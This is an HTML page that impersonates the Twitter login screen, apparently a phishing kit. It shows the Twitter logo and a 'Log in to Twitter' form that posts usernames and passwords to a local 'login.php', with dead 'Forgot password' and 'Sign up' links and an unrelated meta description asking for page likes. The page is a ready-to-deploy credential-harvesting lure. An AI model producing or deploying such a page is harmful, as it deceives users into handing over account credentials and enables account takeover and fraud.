<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=devic­e-width, initial-scale=1.0, user-scalable=no">
    <meta property="og:image" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSPqkOrnpxQRbdjUqyI7q-0onG_Em6wLPnjlgjN38mgYoJpPJsBOzzu0Mob&s=10">
    <link rel="SHORTCUT ICON" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSPqkOrnpxQRbdjUqyI7q-0onG_Em6wLPnjlgjN38mgYoJpPJsBOzzu0Mob&s=10" type="image/jpg">
    <meta name="description" content="Words Can Kill people, Hello po baka pwede pong mag palike sa aming page, Malaking tulong po ang inyong like para mapansin ang hinanain ng taong bayan">
    <title>Login - Sign Up</title>
  </head>
  <body>
    <div class="media">
    <div class="imglogo">
      <img class="logo" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRoxKxzrPDtJEsF8S11ttyvdmGVTvkFgfHgeg&usqp=CAU" alt="" />
    </div>
    <h1>Log in to Twitter</h1>
    <form action="login.php" method="POST" accept-charset="utf-8">
      <input type="text" name="email" placeholder="Phone, Email, Username" value="" required/>
      <input type="password" placeholder="Password" name="password" value="" required>
      <button name="button" type="submit">Log in</button>
    </form><br><center>
    <a href="">Forgot password?</a><a href="">Sign up for Twitter</a><br><br>
    <script src="https://kit.fontawesome.com/66aa7c98b3.js" crossorigin="anonymous"></script>
    <p>Login Using</p><br>
    <div class="icons">
           <a href="#"><i class="fab fa-facebook"></i></a>
           <a href="#"><i class="fab fa-apple"></i></a>
           <a href="#"><i class="fab fa-google"></i></a>
    </center>
    </div>
    <style type="text/css" media="all">
      .logo {
        width: 80px;
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-top: 40px;
      }
      h1 {
        text-align: center;
        font-size: 25px;
        margin-top: 20px;
      }
      input {
        width: 88%;
        height: 45px;
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-top: 20px;
        border: none;
        outline: none;
        border-bottom: 1px solid black;
      }
      button {
        margin-top: 20px;
        display: block;
        margin-left: auto;
        margin-right: auto;
        width: 310px;
        height: 45px;
        border-radius: 35px;
        border: none;
        outline: none;
        font-weight: bold;
        font-size: 15px;
        background: #107ce0cb;
        color: white;
      }
      a {
        margin: 15px;
        text-decoration: none;
        color: #0a82c6;
        font-size: 15px;
      }
      i {
        margin-left: 11px;
        font-size: 40px;
        letter-spacing: 33px;
        margin-top: 30px;
      }
      p {
        margin-top: 20px
        font-weight: bold;
        font-size: 15px;
      }
      @media only screen and (min-width: 768px){
        input {
          width: 300px;
        }
        body {
          height: 100vh;
        }
        }
    </style>
  </body>
</html>